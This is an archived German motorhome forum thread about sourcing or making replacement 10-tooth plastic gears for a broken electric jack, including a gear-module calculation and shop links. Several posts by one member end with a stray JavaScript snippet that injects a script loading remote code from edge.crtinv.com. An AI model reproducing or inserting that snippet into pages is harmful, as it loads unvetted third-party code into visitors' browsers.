PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Hubstütze defekt



alfahel
07.09.2012, 13:59
Hallo liebe Leute hier im Forum!!!

:D:D:D:D viele werdene staunen aber jaaaaaaaa uns gibts auch noch!!!!!!!! :D:D:D:D:

Ich hab ein kleines technisches Problem!
Beim herrichten unseres WOMOS stellte ich fest, dass die hintere Hubstütze defekt ist und immer die Sicherung schoss!
Ich zerlegte das Ding und stellte fest, dass die Kunststoffzahnräder abgebrochen sind und das Planetengetriebe somit blockierte!
Hmmmmm nun dachte ich, dass es ja nicht sooo schwer sein wird, Zahnräder aufzutreiben.
Falsch gedacht, hab im Modellbau nachgefragt und gesucht, kein Erfolg!

Nun meine Frage an Euch, habt ihr eine Idee wo man so kleine Zahnräder bekommt, bzw hat jemand zwei el. Hubstützen die für ein ALCO-Fahrgestell passen herumliegen, die er nicht braucht!?

Danke schon mal im voraus für zahlreiche Infos!
:):)

Allesfahrer
07.09.2012, 14:46
Jo Hi!!!

Is das zufällig die Stütze auf der Renate immer liegt? *duckundweg* :D

Ne im Ernst, das wäre eine Möglichkeit:

http://www.metallmodellbau.de/GEAR-CUTTING.php

Oder eine Firma die dir die Zahnräder anfertigen kann, hab aber leider keine Ahnung wie das preislich aussieht.

Dann bis spätestens beim Treffen!

alfahel
07.09.2012, 15:02
hello gerry!

schöne grüße von renate!! ;)
Sie meine auf der liegst du ja immer drufff drumm ist ja defekt!!!!! :D
Aber danke nur wer solls so rausdrehen?
Hab keine drehbank

Allesfahrer
07.09.2012, 15:03
Hier zB.:

http://www.zahnrad-stainer.at/stainer/home.htm

AndyT
07.09.2012, 15:22
Hallo liebe Leute hier im Forum!!!

:D:D:D:D viele werdene staunen aber jaaaaaaaa uns gibts auch noch!!!!!!!! :D:D:D:D:

Ich hab ein kleines technisches Problem!
Beim herrichten unseres WOMOS stellte ich fest, dass die hintere Hubstütze defekt ist und immer die Sicherung schoss!
Ich zerlegte das Ding und stellte fest, dass die Kunststoffzahnräder abgebrochen sind und das Planetengetriebe somit blockierte!
Hmmmmm nun dachte ich, dass es ja nicht sooo schwer sein wird, Zahnräder aufzutreiben.
Falsch gedacht, hab im Modellbau nachgefragt und gesucht, kein Erfolg!

Nun meine Frage an Euch, habt ihr eine Idee wo man so kleine Zahnräder bekommt, bzw hat jemand zwei el. Hubstützen die für ein ALCO-Fahrgestell passen herumliegen, die er nicht braucht!?

Danke schon mal im voraus für zahlreiche Infos!
:):)

Hallo

so, fangen wir mal von vorne an.....wie schnell benötigst du das od. die Zahnräder..?
Zahnräder bei einer Firma fertigen zulassen bedeutet höhere Kosten und auch Zeit weil man in den Fertigungsprozess eingreift.
Zur Fertigung, das Zahnrad muß einmal abgenommen werden (Zähnezahl,Modul,Profilverschiebung uvm.).
Werkstoff...sollte kein problem darstellen,man wird wahrscheinlich gleich eine Stahlausführung fertigen lassen.
Zweite möglichkeit wäre das Zahnrad abnehmen, eine Zeichnung 1:1 machen und bei einer anderen Firma durch drahterodieren fertigen zulassen.

Also, bitte um weitere Info...!!!

alfahel
07.09.2012, 15:34
Hello Andy!

Hmmmm wenn benötige ich Die Zahnräder bzw andere Stüzen bald, denn wir wolln ja ein oder zwei Tage vorm ct-treffen schon unten sein!
wegen den daten; es handelt sich um kunststoff räder mit 10Zähnen für einen Achsdurchmesser von 2,8mm, die Höhe beträgt 7,5mm und der Durchmesser Zahn auf Zahn beträgt 8,5mm
hab die verzahnung mit einem Motorritzel aus dem Modellbau verglichen aber das Prob sind die Abmessungen die sind alle kleiner!
Ich dacht auch schon an Messingräder weil das Antriebsritzel kunststoff ist und der Außenkranz ebenfalls!

lg

derfranze
07.09.2012, 17:25
Ein Zahnrad wird nach
1. der Zähnezahl und
2. nach dem Modul (Zahngröße) berechnet wobei der Teilkreisdurchmesser gleich dem Rechendurchmesser des Achsabstandes und Zahnrades ist.
Beispiele:
ein Zahnrad mit 10 Zähnen und m1 (Modul1) hat 12 mm Außendurchmesser oder Kopfkreisdurchmesser, 10 mm Teilkreisdurchmesser und 8 mm Fußkreisdurchmesser

nach der Formel Außendurchmesser= Zähnezahl + 2mal modul1 = 12 mm

ein Zahnrad mit 25 Zähnen und m0,7 hat 18,9 mm Kopfkreis, 17,5 Teilkreis und 16,1 mm Fußkreisdurchdmesser

Am leichtesten bestimmen Sie den Modul indem der Kopfkfreisdurchmesser und der Fußkreisdurchmesser einzeln gemessen, dann zusammengezählt und durch 2 dividiert werden. Diese Zahl dann durch die Zähnezahl und sie haben das richtige Ergebnis.

Zahnzahl= 25, Kopfkreis = 27, Fußkreis = 23, 27+23=50/25= m2 Modul2

versuchen wir, ihr Zahnrad zu bestimmen:

Der gesuchte Modul = Zähnezahl von 10 bei 8,5 mm Kopfkreisdurchmesser könnte je nach Abnützung m0,75 sein 10x0,75 + 1,5 = 9 mm (ist 0,5 mm zu groß nach gemessen)


lg Franz!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

alfahel
07.09.2012, 17:34
hallo franz!!!
Pfffffff verwirrts mich ja nur!:confused::confused::confused::confused:
Ich glaub ich werd mir zwei neue kaufen uns basta!
Das ist mir zu mühsam:o:o:o

46erkurt
07.09.2012, 18:52
Nur auf die schnelle so eine Idee- Zahnräder von der zweiten Stützte ausbauen und als Muster nehmen.

Kurt:confused:

derfranze
07.09.2012, 20:00
http://shop.gears24.com/Stirnraeder/FTP/FTP-Module-0-7/FTP0-7-10-b5-0.html

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

alfahel
08.09.2012, 07:30
guten morgen franz!

Danke vorweg auch an dich aber da sind die passenden nicht dabei weil die breite zu klein ist :(

@ 46er Kurt Ich hab eh ein Musterrad von der defekten alle hats eh nicht demoliert
desshalb hab ich ja die Maße :):)

campingbus
08.09.2012, 08:59
Dein Problem ist die Zeit. Ich habe mir einmal Zahnräder in der Bulme machen lassen. Der Lehrer meinte, ist ein gutes Projekt für die Schüler. Aber da braucht man Zeit.

derfranze
08.09.2012, 12:53
guten morgen franz!

Danke vorweg auch an dich aber da sind die passenden nicht dabei weil die breite zu klein ist :(

@ 46er Kurt Ich hab eh ein Musterrad von der defekten alle hats eh nicht demoliert
desshalb hab ich ja die Maße :):)

äehm.. 2 Zahnräder kaufen, größeres Loch bohren, auf eine Hohlwelle mit passender Bohrung für die Achse pressen und die Breite mit der Feile auf der Bohrmaschine anpassen?

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

stefferl
08.09.2012, 12:59
http://www.steininger.co.at/Anhaenger/Anhaenger-Ersatzteile/

Gibt es bei AL-KO eigentlich keine Ersatzteile? Entschuldigt bitte meine naive Frage. Der Link ist über Ersatzteile Wohnwagenstützen. Weiß schon, dass es sich um ein Womo handelt.

http://shop.gears24.com/

Hast du diesen Link schon gehabt? Vielleicht hilft dir der weiter.

tojamata
08.09.2012, 13:23
servus,

misumi onlinekatalog

www.misumi.com

dort findest du die entsprechenden zahnräder in kunststoff alu oder stahl

alfahel
08.09.2012, 13:36
Mahlzeit stefferl!

Ist nicht naiv nur das Prob ist keiner kann mir sagen was das für Stützen sind!
Nicht mal bei Frankia selbst im moment! Ich hab zwar jedemenge Beschreibungen vom WOMO aber nix über die Stützen!
Wenn ich Zeit hätte wärs ja kein Problem aber die Stütze ist zum denkbar ungünstigsten Zeitpunkt eingegangen

@ franz Danke das Problem liegt an der Höhe des Zahnrades nicht der Durchmesser und die Zahnanzahl!
Im Modellbau hab ich auch schon Motorritzel gesucht aber alle leider nicht so hoch oder nicht möglich zum aufbohren!

AndyT
09.09.2012, 12:55
Mahlzeit stefferl!

Ist nicht naiv nur das Prob ist keiner kann mir sagen was das für Stützen sind!
Nicht mal bei Frankia selbst im moment! Ich hab zwar jedemenge Beschreibungen vom WOMO aber nix über die Stützen!
Wenn ich Zeit hätte wärs ja kein Problem aber die Stütze ist zum denkbar ungünstigsten Zeitpunkt eingegangen

@ franz Danke das Problem liegt an der Höhe des Zahnrades nicht der Durchmesser und die Zahnanzahl!
Im Modellbau hab ich auch schon Motorritzel gesucht aber alle leider nicht so hoch oder nicht möglich zum aufbohren!

Hallo

muß dir leider einen Korb geben für die Fertigung eines solchen Zahnrad sind unsere Maschinen etwas zu groß(:D) od.das Zahnrad zu klein und wir haben auch kein Werkzeug für Modul =0.7mm, Leider.
Zeit benötigst ihr sowieso wenn ihr irgend wie zu einen neuen Zahnrad kommen möchtet.

Die Erklärung von derFranze ist dem nichts hinzuzufügen, Die beider Zahnräder fluchtend verkleben (Loctite) und einfach
Aufbohren, aber Achtung auf den Rundlauf sonst hast sofort wieder einen Schaden.

Ps: ...Fischertechnik od. Legotechnik....vielleicht haben die etwas passendes.
Pss:..es müßte doch ein Typenschild auf einer der Stütze sein...???

Bobby1
09.09.2012, 14:01
grüß euch alle ;)
ich frage mich schon die ganze zeit wieviel kostet den ein paar stützen neu ich bin sicher das sich die
jeder womo fahrer doch leisten kann auch wen er schon in der pensi ist ... hab ich nicht recht ???
ich habe meine zwei vor 3 monaten hergeschenkt weil ich sie nicht mehr brauchte !!!

alfahel
09.09.2012, 19:07
Hello schönen Abend!
Ma war ein toller Tag heut traum wetter haben gegrillt hmmmmm lecka wars!

@Andy T, Danke ist sehr nett von dir. Aber kann ma nix machen halt!
Leider ist auf keinen von beiden ein Typenschild vorhanden hab schon nachgeschaut und war schon beim Händler damit und die können auch nicht sagen was das fürn Type ist!

@ Bobby1
Es geht nicht ums leisten,.... hmmmm oder doch weil ich nur ein Paar bekomme und da bewegen sich die Preise von €1,500.- aufwärts.
Und das geb ich für mein WOMO aufgrund des Baujahres und wer weis wie lang ich dieses noch habe, nicht mehr aus!

lg

Allesfahrer
09.09.2012, 19:13
Hallo!

Hast du hier schon nachgefragt?:

http://www.zahnrad-stainer.at/stainer/home.htm

Ich würde zumindest mal fragen was es kostet und wie lange es dauert.
Wenn es mit Voranmeldung in einem Tag gemacht werden kann (was ich glaube) könntest du das Muster vor dem treffen in der Früh abgeben, einen schönen Tag in WR Neustadt verbringen und die Dinger dann am CP einbauen. ;)

alfahel
09.09.2012, 19:17
hallo gerry!
Danke nein hab ich noch nicht war ja Freitag!
Aber werd am Montag anrufen!

Was anderes wann kommts ihr eigentlich zum ct?

Allesfahrer
09.09.2012, 19:19
Wir kommen erst am FR, müssen ja ab morgen wieder arbeiten. :(

Wir hätten ja gerne bis MO verlängert, aber die Kids müssen ja auch in die Schule. :(

Edit: Ach ja FR. :)

alfahel
09.09.2012, 19:26
Hello!
Jetza hab ich mir das erst richtig durchgelesen von vorhin!
Ich soll das dann am CT zusammenschrauben?:eek::eek::eek:
Na sicher nicht!
Da hab ich was anderes vor! und wenns Wetter passt werden wir vielleicht schon Mittwoch oder so runterfahren! :p:p:p:p

Allesfahrer
09.09.2012, 20:53
Na das passt doch, am Mittwoch nach WR Neustadt, am DO montieren und am FR kommen wir :)

Aber schau bitte das du fertig wirst, nicht das wir am FR helfen müssen. :D

alfahel
10.09.2012, 13:12
Mahlzeit!
@ gerry
Ich glaub dir hat die sonne oder so........:D:D:D:p:p:p;);)
Nein ich hab mir jetze ein Paar neue bestellt aber nicht elektrisch!
Habe aber bei der Fa. in Wr. Neustadt angerufen aber noch keine Rückantwort bekommen!
Egal wenn ich Zahnräder auftreibe werd ich die el. Stützen wieder montieren und die mech. für vorne verwenden denn die kann man vorne oder hinten verwenden!

derfranze
14.09.2012, 11:45
http://sehling.net/shop/page/20?sessid=4lb9CyEkjVf87Wumps1jUnKDf0ilruCIeKk0jIis pzQnhTmU6WjdcodwCfJkPJRi&shop_param=

Da gibt es Zahnräder von Modul 0,2 bis Modul1
lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();!function( ){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();

alfahel
14.09.2012, 12:22
Suuper danke Franz!

Werd mal nachschaun!
Fahre in 2 Wochen nach ockerau zu Modellbauhändler der auch tuning macht
meine hat sicher was passendes!